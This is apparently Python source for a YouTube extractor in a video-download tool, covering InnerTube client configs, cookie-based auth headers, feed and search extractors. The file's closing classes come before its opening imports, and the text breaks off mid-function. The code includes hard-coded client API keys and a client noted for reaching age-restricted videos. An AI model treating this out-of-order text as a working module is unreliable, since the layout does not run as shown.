'community playlists': 'EgeKAQQoAEABagoQChADEAQQCRAF',
'featured playlists': 'EgeKAQQoADgBagwQAxAJEAQQDhAKEAU==',
'songs': 'EgWKAQIIAWoKEAoQAxAEEAkQBQ==',
'videos': 'EgWKAQIQAWoKEAoQAxAEEAkQBQ==',
}
def _real_extract(self, url):
qs = parse_qs(url)
query = (qs.get('search_query') or qs.get('q'))[0]
params = qs.get('sp', (None,))[0]
if params:
section = next((k for k, v in self._SECTIONS.items() if v == params), params)
else:
section = compat_urllib_parse_unquote_plus((url.split('#') + [''])[1]).lower()
params = self._SECTIONS.get(section)
if not params:
section = None
title = join_nonempty(query, section, delim=' - ')
return self.playlist_result(self._search_results(query, params, default_client='web_music'), title, title)
class YoutubeFeedsInfoExtractor(InfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME property.
"""
_LOGIN_REQUIRED = True
_TESTS = []
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_extract(self, url):
return self.url_result(
f'https://www.youtube.com/feed/{self._FEED_NAME}', ie=YoutubeTabIE.ie_key())
class YoutubeWatchLaterIE(InfoExtractor):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list; ":ytwatchlater" keyword (requires cookies)'
_VALID_URL = r':ytwatchlater'
_TESTS = [{
'url': ':ytwatchlater',
'only_matching': True,
}]
def _real_extract(self, url):
return self.url_result(
'https://www.youtube.com/playlist?list=WL', ie=YoutubeTabIE.ie_key())
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube recommended videos; ":ytrec" keyword'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/?(?:[?#]|$)|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_LOGIN_REQUIRED = False
_TESTS = [{
'url': ':ytrec',
'only_matching': True,
}, {
'url': ':ytrecommended',
'only_matching': True,
}, {
'url': 'https://youtube.com',
'only_matching': True,
}]
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube subscriptions feed; ":ytsubs" keyword (requires cookies)'
_VALID_URL = r':ytsub(?:scription)?s?'
_FEED_NAME = 'subscriptions'
_TESTS = [{
'url': ':ytsubs',
'only_matching': True,
}, {
'url': ':ytsubscriptions',
'only_matching': True,
}]
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history; ":ythis" keyword (requires cookies)'
_VALID_URL = r':ythis(?:tory)?'
_FEED_NAME = 'history'
_TESTS = [{
'url': ':ythistory',
'only_matching': True,
}]
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeClipIE(InfoExtractor):
IE_NAME = 'youtube:clip'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/clip/'
def _real_extract(self, url):
self.report_warning('YouTube clips are not currently supported. The entire video will be downloaded instead')
return self.url_result(url, 'Generic')
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| # coding: utf-8
from __future__ import unicode_literals
import calendar
import copy
import datetime
import functools
import hashlib
import itertools
import json
import math
import os.path
import random
import re
import sys
import time
import traceback
import threading
from .common import InfoExtractor, SearchInfoExtractor
from ..compat import (
compat_chr,
compat_HTTPError,
compat_parse_qs,
compat_str,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
)
from ..jsinterp import JSInterpreter
from ..utils import (
bug_reports_message,
clean_html,
datetime_from_str,
dict_get,
error_to_compat_str,
ExtractorError,
float_or_none,
format_field,
get_first,
int_or_none,
is_html,
join_nonempty,
js_to_json,
mimetype2ext,
network_exceptions,
NO_DEFAULT,
orderedSet,
parse_codecs,
parse_count,
parse_duration,
parse_iso8601,
parse_qs,
qualities,
remove_end,
remove_start,
smuggle_url,
str_or_none,
str_to_int,
strftime_or_none,
traverse_obj,
try_get,
unescapeHTML,
unified_strdate,
unified_timestamp,
unsmuggle_url,
update_url_query,
url_or_none,
urljoin,
variadic,
)
# any clients starting with _ cannot be explicity requested by the user
INNERTUBE_CLIENTS = {
'web': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB',
'clientVersion': '2.20211221.00.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 1
},
'web_embedded': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB_EMBEDDED_PLAYER',
'clientVersion': '1.20211215.00.01',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 56
},
'web_music': {
'INNERTUBE_API_KEY': 'AIzaSyC9XL3ZjWddXya6X74dJoCTL-WEYFDNX30',
'INNERTUBE_HOST': 'music.youtube.com',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB_REMIX',
'clientVersion': '1.20211213.00.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 67,
},
'web_creator': {
'INNERTUBE_API_KEY': 'AIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMo',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB_CREATOR',
'clientVersion': '1.20211220.02.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 62,
},
'android': {
'INNERTUBE_API_KEY': 'AIzaSyA8eiZmM1FaDVjRy-df2KTyQ_vz_yYM39w',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID',
'clientVersion': '16.49',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 3,
'REQUIRE_JS_PLAYER': False
},
'android_embedded': {
'INNERTUBE_API_KEY': 'AIzaSyCjc_pVEDi4qsv5MtC2dMXzpIaDoRFLsxw',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID_EMBEDDED_PLAYER',
'clientVersion': '16.49',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 55,
'REQUIRE_JS_PLAYER': False
},
'android_music': {
'INNERTUBE_API_KEY': 'AIzaSyAOghZGza2MQSZkY_zfZ370N-PUdXEo8AI',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID_MUSIC',
'clientVersion': '4.57',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 21,
'REQUIRE_JS_PLAYER': False
},
'android_creator': {
'INNERTUBE_API_KEY': 'AIzaSyD_qjV8zaaUMehtLkrKFgVeSX_Iqbtyws8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID_CREATOR',
'clientVersion': '21.47',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 14,
'REQUIRE_JS_PLAYER': False
},
# iOS clients have HLS live streams. Setting device model to get 60fps formats.
# See: https://github.com/TeamNewPipe/NewPipeExtractor/issues/680#issuecomment-1002724558
'ios': {
'INNERTUBE_API_KEY': 'AIzaSyB-63vPrdThhKuerbB2N_l7Kwwcxj6yUAc',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS',
'clientVersion': '16.46',
'deviceModel': 'iPhone14,3',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 5,
'REQUIRE_JS_PLAYER': False
},
'ios_embedded': {
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS_MESSAGES_EXTENSION',
'clientVersion': '16.46',
'deviceModel': 'iPhone14,3',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 66,
'REQUIRE_JS_PLAYER': False
},
'ios_music': {
'INNERTUBE_API_KEY': 'AIzaSyBAETezhkwP0ZWA02RsqT1zu78Fpt0bC_s',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS_MUSIC',
'clientVersion': '4.57',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 26,
'REQUIRE_JS_PLAYER': False
},
'ios_creator': {
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS_CREATOR',
'clientVersion': '21.47',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 15,
'REQUIRE_JS_PLAYER': False
},
# mweb has 'ultralow' formats
# See: https://github.com/yt-dlp/yt-dlp/pull/557
'mweb': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'MWEB',
'clientVersion': '2.20211221.01.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 2
},
# This client can access age restricted videos (unless the uploader has disabled the 'allow embedding' option)
# See: https://github.com/zerodytrash/YouTube-Internal-Clients
'tv_embedded': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'TVHTML5_SIMPLY_EMBEDDED_PLAYER',
'clientVersion': '2.0',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 85
},
}
def _split_innertube_client(client_name):
variant, *base = client_name.rsplit('.', 1)
if base:
return variant, base[0], variant
base, *variant = client_name.split('_', 1)
return client_name, base, variant[0] if variant else None
def build_innertube_clients():
THIRD_PARTY = {
'embedUrl': 'https://www.youtube.com/', # Can be any valid URL
}
BASE_CLIENTS = ('android', 'web', 'tv', 'ios', 'mweb')
priority = qualities(BASE_CLIENTS[::-1])
for client, ytcfg in tuple(INNERTUBE_CLIENTS.items()):
ytcfg.setdefault('INNERTUBE_API_KEY', 'AIzaSyDCU8hByM-4DrUqRUYnGn-3llEO78bcxq8')
ytcfg.setdefault('INNERTUBE_HOST', 'www.youtube.com')
ytcfg.setdefault('REQUIRE_JS_PLAYER', True)
ytcfg['INNERTUBE_CONTEXT']['client'].setdefault('hl', 'en')
_, base_client, variant = _split_innertube_client(client)
ytcfg['priority'] = 10 * priority(base_client)
if not variant:
INNERTUBE_CLIENTS[f'{client}_embedscreen'] = embedscreen = copy.deepcopy(ytcfg)
embedscreen['INNERTUBE_CONTEXT']['client']['clientScreen'] = 'EMBED'
embedscreen['INNERTUBE_CONTEXT']['thirdParty'] = THIRD_PARTY
embedscreen['priority'] -= 3
elif variant == 'embedded':
ytcfg['INNERTUBE_CONTEXT']['thirdParty'] = THIRD_PARTY
ytcfg['priority'] -= 2
else:
ytcfg['priority'] -= 3
build_innertube_clients()
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_RESERVED_NAMES = (
r'channel|c|user|playlist|watch|w|v|embed|e|watch_popup|clip|'
r'shorts|movies|results|search|shared|hashtag|trending|explore|feed|feeds|'
r'browse|oembed|get_video_info|iframe_api|s/player|'
r'storefront|oops|index|account|reporthistory|t/terms|about|upload|signin|logout')
_PLAYLIST_ID_RE = r'(?:(?:PL|LL|EC|UU|FL|RD|UL|TL|PU|OLAK5uy_)[0-9A-Za-z-_]{10,}|RDMM|WL|LL|LM)'
# _NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_INVIDIOUS_SITES = (
# invidious-redirect websites
r'(?:www\.)?redirect\.invidious\.io',
r'(?:(?:www|dev)\.)?invidio\.us',
# Invidious instances taken from https://github.com/iv-org/documentation/blob/master/Invidious-Instances.md
r'(?:www\.)?invidious\.pussthecat\.org',
r'(?:www\.)?invidious\.zee\.li',
r'(?:www\.)?invidious\.ethibox\.fr',
r'(?:www\.)?invidious\.3o7z6yfxhbw7n3za4rss6l434kmv55cgw2vuziwuigpwegswvwzqipyd\.onion',
r'(?:www\.)?osbivz6guyeahrwp2lnwyjk2xos342h4ocsxyqrlaopqjuhwn2djiiyd\.onion',
r'(?:www\.)?u2cvlit75owumwpy4dj2hsmvkq7nvrclkpht7xgyye2pyoxhpmclkrad\.onion',
# youtube-dl invidious instances list
r'(?:(?:www|no)\.)?invidiou\.sh',
r'(?:(?:www|fi)\.)?invidious\.snopyta\.org',
r'(?:www\.)?invidious\.kabi\.tk',
r'(?:www\.)?invidious\.mastodon\.host',
r'(?:www\.)?invidious\.zapashcanon\.fr',
r'(?:www\.)?(?:invidious(?:-us)?|piped)\.kavin\.rocks',
r'(?:www\.)?invidious\.tinfoil-hat\.net',
r'(?:www\.)?invidious\.himiko\.cloud',
r'(?:www\.)?invidious\.reallyancient\.tech',
r'(?:www\.)?invidious\.tube',
r'(?:www\.)?invidiou\.site',
r'(?:www\.)?invidious\.site',
r'(?:www\.)?invidious\.xyz',
r'(?:www\.)?invidious\.nixnet\.xyz',
r'(?:www\.)?invidious\.048596\.xyz',
r'(?:www\.)?invidious\.drycat\.fr',
r'(?:www\.)?inv\.skyn3t\.in',
r'(?:www\.)?tube\.poal\.co',
r'(?:www\.)?tube\.connect\.cafe',
r'(?:www\.)?vid\.wxzm\.sx',
r'(?:www\.)?vid\.mint\.lgbt',
r'(?:www\.)?vid\.puffyan\.us',
r'(?:www\.)?yewtu\.be',
r'(?:www\.)?yt\.elukerio\.org',
r'(?:www\.)?yt\.lelux\.fi',
r'(?:www\.)?invidious\.ggc-project\.de',
r'(?:www\.)?yt\.maisputain\.ovh',
r'(?:www\.)?ytprivate\.com',
r'(?:www\.)?invidious\.13ad\.de',
r'(?:www\.)?invidious\.toot\.koeln',
r'(?:www\.)?invidious\.fdn\.fr',
r'(?:www\.)?watch\.nettohikari\.com',
r'(?:www\.)?invidious\.namazso\.eu',
r'(?:www\.)?invidious\.silkky\.cloud',
r'(?:www\.)?invidious\.exonip\.de',
r'(?:www\.)?invidious\.riverside\.rocks',
r'(?:www\.)?invidious\.blamefran\.net',
r'(?:www\.)?invidious\.moomoo\.de',
r'(?:www\.)?ytb\.trom\.tf',
r'(?:www\.)?yt\.cyberhost\.uk',
r'(?:www\.)?kgg2m7yk5aybusll\.onion',
r'(?:www\.)?qklhadlycap4cnod\.onion',
r'(?:www\.)?axqzx4s6s54s32yentfqojs3x5i7faxza6xo3ehd4bzzsg2ii4fv2iid\.onion',
r'(?:www\.)?c7hqkpkpemu6e7emz5b4vyz7idjgdvgaaa3dyimmeojqbgpea3xqjoid\.onion',
r'(?:www\.)?fz253lmuao3strwbfbmx46yu7acac2jz27iwtorgmbqlkurlclmancad\.onion',
r'(?:www\.)?invidious\.l4qlywnpwqsluw65ts7md3khrivpirse744un3x7mlskqauz5pyuzgqd\.onion',
r'(?:www\.)?owxfohz4kjyv25fvlqilyxast7inivgiktls3th44jhk3ej3i7ya\.b32\.i2p',
r'(?:www\.)?4l2dgddgsrkf2ous66i6seeyi6etzfgrue332grh2n7madpwopotugyd\.onion',
r'(?:www\.)?w6ijuptxiku4xpnnaetxvnkc5vqcdu7mgns2u77qefoixi63vbvnpnqd\.onion',
r'(?:www\.)?kbjggqkzv65ivcqj6bumvp337z6264huv5kpkwuv6gu5yjiskvan7fad\.onion',
r'(?:www\.)?grwp24hodrefzvjjuccrkw3mjq4tzhaaq32amf33dzpmuxe7ilepcmad\.onion',
r'(?:www\.)?hpniueoejy4opn7bc4ftgazyqjoeqwlvh2uiku2xqku6zpoa4bf5ruid\.onion',
)
def _initialize_consent(self):
cookies = self._get_cookies('https://www.youtube.com/')
if cookies.get('__Secure-3PSID'):
return
consent_id = None
consent = cookies.get('CONSENT')
if consent:
if 'YES' in consent.value:
return
consent_id = self._search_regex(
r'PENDING\+(\d+)', consent.value, 'consent', default=None)
if not consent_id:
consent_id = random.randint(100, 999)
self._set_cookie('.youtube.com', 'CONSENT', 'YES+cb.20210328-17-p0.en+FX+%s' % consent_id)
def _initialize_pref(self):
cookies = self._get_cookies('https://www.youtube.com/')
pref_cookie = cookies.get('PREF')
pref = {}
if pref_cookie:
try:
pref = dict(compat_urlparse.parse_qsl(pref_cookie.value))
except ValueError:
self.report_warning('Failed to parse user PREF cookie' + bug_reports_message())
pref.update({'hl': 'en', 'tz': 'UTC'})
self._set_cookie('.youtube.com', name='PREF', value=compat_urllib_parse_urlencode(pref))
def _real_initialize(self):
self._initialize_pref()
self._initialize_consent()
if (self._LOGIN_REQUIRED
and self.get_param('cookiefile') is None
and self.get_param('cookiesfrombrowser') is None):
self.raise_login_required('Login details are needed to download this content', method='cookies')
_YT_INITIAL_DATA_RE = r'(?:window\s*\[\s*["\']ytInitialData["\']\s*\]|ytInitialData)\s*=\s*({.+?})\s*;'
_YT_INITIAL_PLAYER_RESPONSE_RE = r'ytInitialPlayerResponse\s*=\s*({.+?})\s*;'
_YT_INITIAL_BOUNDARY_RE = r'(?:var\s+meta|</script|\n)'
def _get_default_ytcfg(self, client='web'):
return copy.deepcopy(INNERTUBE_CLIENTS[client])
def _get_innertube_host(self, client='web'):
return INNERTUBE_CLIENTS[client]['INNERTUBE_HOST']
def _ytcfg_get_safe(self, ytcfg, getter, expected_type=None, default_client='web'):
# try_get but with fallback to default ytcfg client values when present
_func = lambda y: try_get(y, getter, expected_type)
return _func(ytcfg) or _func(self._get_default_ytcfg(default_client))
def _extract_client_name(self, ytcfg, default_client='web'):
return self._ytcfg_get_safe(
ytcfg, (lambda x: x['INNERTUBE_CLIENT_NAME'],
lambda x: x['INNERTUBE_CONTEXT']['client']['clientName']), compat_str, default_client)
def _extract_client_version(self, ytcfg, default_client='web'):
return self._ytcfg_get_safe(
ytcfg, (lambda x: x['INNERTUBE_CLIENT_VERSION'],
lambda x: x['INNERTUBE_CONTEXT']['client']['clientVersion']), compat_str, default_client)
def _extract_api_key(self, ytcfg=None, default_client='web'):
return self._ytcfg_get_safe(ytcfg, lambda x: x['INNERTUBE_API_KEY'], compat_str, default_client)
def _extract_context(self, ytcfg=None, default_client='web'):
context = get_first(
(ytcfg, self._get_default_ytcfg(default_client)), 'INNERTUBE_CONTEXT', expected_type=dict)
# Enforce language and tz for extraction
client_context = traverse_obj(context, 'client', expected_type=dict, default={})
client_context.update({'hl': 'en', 'timeZone': 'UTC', 'utcOffsetMinutes': 0})
return context
_SAPISID = None
def _generate_sapisidhash_header(self, origin='https://www.youtube.com'):
time_now = round(time.time())
if self._SAPISID is None:
yt_cookies = self._get_cookies('https://www.youtube.com')
# Sometimes SAPISID cookie isn't present but __Secure-3PAPISID is.
# See: https://github.com/yt-dlp/yt-dlp/issues/393
sapisid_cookie = dict_get(
yt_cookies, ('__Secure-3PAPISID', 'SAPISID'))
if sapisid_cookie and sapisid_cookie.value:
self._SAPISID = sapisid_cookie.value
self.write_debug('Extracted SAPISID cookie')
# SAPISID cookie is required if not already present
if not yt_cookies.get('SAPISID'):
self.write_debug('Copying __Secure-3PAPISID cookie to SAPISID cookie')
self._set_cookie(
'.youtube.com', 'SAPISID', self._SAPISID, secure=True, expire_time=time_now + 3600)
else:
self._SAPISID = False
if not self._SAPISID:
return None
# SAPISIDHASH algorithm from https://stackoverflow.com/a/32065323
sapisidhash = hashlib.sha1(
f'{time_now} {self._SAPISID} {origin}'.encode('utf-8')).hexdigest()
return f'SAPISIDHASH {time_now}_{sapisidhash}'
def _call_api(self, ep, query, video_id, fatal=True, headers=None,
note='Downloading API JSON', errnote='Unable to download API page',
context=None, api_key=None, api_hostname=None, default_client='web'):
data = {'context': context} if context else {'context': self._extract_context(default_client=default_client)}
data.update(query)
real_headers = self.generate_api_headers(default_client=default_client)
real_headers.update({'content-type': 'application/json'})
if headers:
real_headers.update(headers)
return self._download_json(
'https://%s/youtubei/v1/%s' % (api_hostname or self._get_innertube_host(default_client), ep),
video_id=video_id, fatal=fatal, note=note, errnote=errnote,
data=json.dumps(data).encode('utf8'), headers=real_headers,
query={'key': api_key or self._extract_api_key(), 'prettyPrint': 'false'})
def extract_yt_initial_data(self, item_id, webpage, fatal=True):
data = self._search_regex(
(r'%s\s*%s' % (self._YT_INITIAL_DATA_RE, self._YT_INITIAL_BOUNDARY_RE),
self._YT_INITIAL_DATA_RE), webpage, 'yt initial data', fatal=fatal)
if data:
return self._parse_json(data, item_id, fatal=fatal)
@staticmethod
def _extract_session_index(*data):
"""
Index of current account in account list.
See: https://github.com/yt-dlp/yt-dlp/pull/519
"""
for ytcfg in data:
session_index = int_or_none(try_get(ytcfg, lambda x: x['SESSION_INDEX']))
if session_index is not None:
return session_index
# Deprecated?
def _extract_identity_token(self, ytcfg=None, webpage=None):
if ytcfg:
token = try_get(ytcfg, lambda x: x['ID_TOKEN'], compat_str)
if token:
return token
if webpage:
return self._search_regex(
r'\bID_TOKEN["\']\s*:\s*["\'](.+?)["\']', webpage,
'identity token', default=None, fatal=False)
@staticmethod
def _extract_account_syncid(*args):
"""
Extract syncId required to download private playlists of secondary channels
@params response and/or ytcfg
"""
for data in args:
# ytcfg includes channel_syncid if on secondary channel
delegated_sid = try_get(data, lambda x: x['DELEGATED_SESSION_ID'], compat_str)
if delegated_sid:
return delegated_sid
sync_ids = (try_get(
data, (lambda x: x['responseContext']['mainAppWebResponseContext']['datasyncId'],
lambda x: x['DATASYNC_ID']), compat_str) or '').split('||')
if len(sync_ids) >= 2 and sync_ids[1]:
# datasyncid is of the form "channel_syncid||user_syncid" for secondary channel
# and just "user_syncid||" for primary channel. We only want the channel_syncid
return sync_ids[0]
@staticmethod
def _extract_visitor_data(*args):
"""
Extracts visitorData from an API response or ytcfg
Appears to be used to track session state
"""
return get_first(
args, [('VISITOR_DATA', ('INNERTUBE_CONTEXT', 'client', 'visitorData'), ('responseContext', 'visitorData'))],
expected_type=str)
@property
def is_authenticated(self):
return bool(self._generate_sapisidhash_header())
def extract_ytcfg(self, video_id, webpage):
if not webpage:
return {}
return self._parse_json(
self._search_regex(
r'ytcfg\.set\s*\(\s*({.+?})\s*\)\s*;', webpage, 'ytcfg',
default='{}'), video_id, fatal=False) or {}
def generate_api_headers(
self, *, ytcfg=None, account_syncid=None, session_index=None,
visitor_data=None, identity_token=None, api_hostname=None, default_client='web'):
origin = 'https://' + (api_hostname if api_hostname else self._get_innertube_host(default_client))
headers = {
'X-YouTube-Client-Name': compat_str(
self._ytcfg_get_safe(ytcfg, lambda x: x['INNERTUBE_CONTEXT_CLIENT_NAME'], default_client=default_client)),
'X-YouTube-Client-Version': self._extract_client_version(ytcfg, default_client),
'Origin': origin,
'X-Youtube-Identity-Token': identity_token or self._extract_identity_token(ytcfg),
'X-Goog-PageId': account_syncid or self._extract_account_syncid(ytcfg),
'X-Goog-Visitor-Id': visitor_data or self._extract_visitor_data(ytcfg)
}
if session_index is None:
session_index = self._extract_session_index(ytcfg)
if account_syncid or session_index is not None:
headers['X-Goog-AuthUser'] = session_index if session_index is not None else 0
auth = self._generate_sapisidhash_header(origin)
if auth is not None:
headers['Authorization'] = auth
headers['X-Origin'] = origin
return {h: v for h, v in headers.items() if v is not None}
@staticmethod
def _build_api_continuation_query(continuation, ctp=None):
query = {
'continuation': continuation
}
# TODO: Inconsistency with clickTrackingParams.
# Currently we have a fixed ctp contained within context (from ytcfg)
# and a ctp in root query for continuation.
if ctp:
query['clickTracking'] = {'clickTrackingParams': ctp}
return query
@classmethod
def _extract_next_continuation_data(cls, renderer):
next_continuation = try_get(
renderer, (lambda x: x['continuations'][0]['nextContinuationData'],
lambda x: x['continuation']['reloadContinuationData']), dict)
if not next_continuation:
return
continuation = next_continuation.get('continuation')
if not continuation:
return
ctp = next_continuation.get('clickTrackingParams')
return cls._build_api_continuation_query(continuation, ctp)
@classmethod
def _extract_continuation_ep_data(cls, continuation_ep: dict):
if isinstance(continuation_ep, dict):
continuation = try_get(
continuation_ep, lambda x: x['continuationCommand']['token'], compat_str)
if not continuation:
return
ctp = continuation_ep.get('clickTrackingParams')
return cls._build_api_continuation_query(continuation, ctp)
@classmethod
def _extract_continuation(cls, renderer):
next_continuation = cls._extract_next_continuation_data(renderer)
if next_continuation:
return next_continuation
contents = []
for key in ('contents', 'items'):
contents.extend(try_get(renderer, lambda x: x[key], list) or [])
for content in contents:
if not isinstance(content, dict):
continue
continuation_ep = try_get(
content, (lambda x: x['continuationItemRenderer']['continuationEndpoint'],
lambda x: x['continuationItemRenderer']['button']['buttonRenderer']['command']),
dict)
continuation = cls._extract_continuation_ep_data(continuation_ep)
if continuation:
return continuation
@classmethod
def _extract_alerts(cls, data):
for alert_dict in try_get(data, lambda x: x['alerts'], list) or []:
if not isinstance(alert_dict, dict):
continue
for alert in alert_dict.values():
alert_type = alert.get('type')
if not alert_type:
continue
message = cls._get_text(alert, 'text')
if message:
yield alert_type, message
def _report_alerts(self, alerts, expected=True, fatal=True, only_once=False):
errors = []
warnings = []
for alert_type, alert_message in alerts:
if alert_type.lower() == 'error' and fatal:
errors.append([alert_type, alert_message])
else:
warnings.append([alert_type, alert_message])
for alert_type, alert_message in (warnings + errors[:-1]):
self.report_warning('YouTube said: %s - %s' % (alert_type, alert_message), only_once=only_once)
if errors:
raise ExtractorError('YouTube said: %s' % errors[-1][1], expected=expected)
def _extract_and_report_alerts(self, data, *args, **kwargs):
return self._report_alerts(self._extract_alerts(data), *args, **kwargs)
def _extract_badges(self, renderer: dict):
badges = set()
for badge in try_get(renderer, lambda x: x['badges'], list) or []:
label = try_get(badge, lambda x: x['metadataBadgeRenderer']['label'], compat_str)
if label:
badges.add(label.lower())
return badges
@staticmethod
def _get_text(data, *path_list, max_runs=None):
for path in path_list or [None]:
if path is None:
obj = [data]
else:
obj = traverse_obj(data, path, default=[])
if not any(key is ... or isinstance(key, (list, tuple)) for key in variadic(path)):
obj = [obj]
for item in obj:
text = try_get(item, lambda x: x['simpleText'], compat_str)
if text:
return text
runs = try_get(item, lambda x: x['runs'], list) or []
if not runs and isinstance(item, list):
runs = item
runs = runs[:min(len(runs), max_runs or len(runs))]
text = ''.join(traverse_obj(runs, (..., 'text'), expected_type=str, default=[]))
if text:
return text
def _get_count(self, data, *path_list):
count_text = self._get_text(data, *path_list) or ''
count = parse_count(count_text)
if count is None:
count = str_to_int(
self._search_regex(r'^([\d,]+)', re.sub(r'\s', '', count_text), 'count', default=None))
return count
@staticmethod
def _extract_thumbnails(data, *path_list):
"""
Extract thumbnails from thumbnails dict
@param path_list: path list to level that contains 'thumbnails' key
"""
thumbnails = []
for path in path_list or [()]:
for thumbnail in traverse_obj(data, (*variadic(path), 'thumbnails', ...), default=[]):
thumbnail_url = url_or_none(thumbnail.get('url'))
if not thumbnail_url:
continue
# Sometimes youtube gives a wrong thumbnail URL. See:
# https://github.com/yt-dlp/yt-dlp/issues/233
# https://github.com/ytdl-org/youtube-dl/issues/28023
if 'maxresdefault' in thumbnail_url:
thumbnail_url = thumbnail_url.split('?')[0]
thumbnails.append({
'url': thumbnail_url,
'height': int_or_none(thumbnail.get('height')),
'width': int_or_none(thumbnail.get('width')),
})
return thumbnails
@staticmethod
def extract_relative_time(relative_time_text):
"""
Extracts a relative time from string and converts to dt object
e.g. 'streamed 6 days ago', '5 seconds ago (edited)', 'updated today'
"""
mobj = re.search(r'(?P<start>today|yesterday|now)|(?P<time>\d+)\s*(?P<unit>microsecond|second|minute|hour|day|week|month|year)s?\s*ago', relative_time_text)
if mobj:
start = mobj.group('start')
if start:
return datetime_from_str(start)
try:
return datetime_from_str('now-%s%s' % (mobj.group('time'), mobj.group('unit')))
except ValueError:
return None
def _extract_time_text(self, renderer, *path_list):
text = self._get_text(renderer, *path_list) or ''
dt = self.extract_relative_time(text)
timestamp = None
if isinstance(dt, datetime.datetime):
timestamp = calendar.timegm(dt.timetuple())
if timestamp is None:
timestamp = (
unified_timestamp(text) or unified_timestamp(
self._search_regex(
(r'([a-z]+\s*\d{1,2},?\s*20\d{2})', r'(?:.+|^)(?:live|premieres|ed|ing)(?:\s*(?:on|for))?\s*(.+\d)'),
text.lower(), 'time text', default=None)))
if text and timestamp is None:
self.report_warning(f"Cannot parse localized time text '{text}'" + bug_reports_message(), only_once=True)
return timestamp, text
def _extract_response(self, item_id, query, note='Downloading API JSON', headers=None,
ytcfg=None, check_get_keys=None, ep='browse', fatal=True, api_hostname=None,
default_client='web'):
response = None
last_error = None
count = -1
retries = self.get_param('extractor_retries', 3)
if check_get_keys is None:
check_get_keys = []
while count < retries:
count += 1
if last_error:
self.report_warning('%s. Retrying ...' % remove_end(last_error, '.'))
try:
response = self._call_api(
ep=ep, fatal=True, headers=headers,
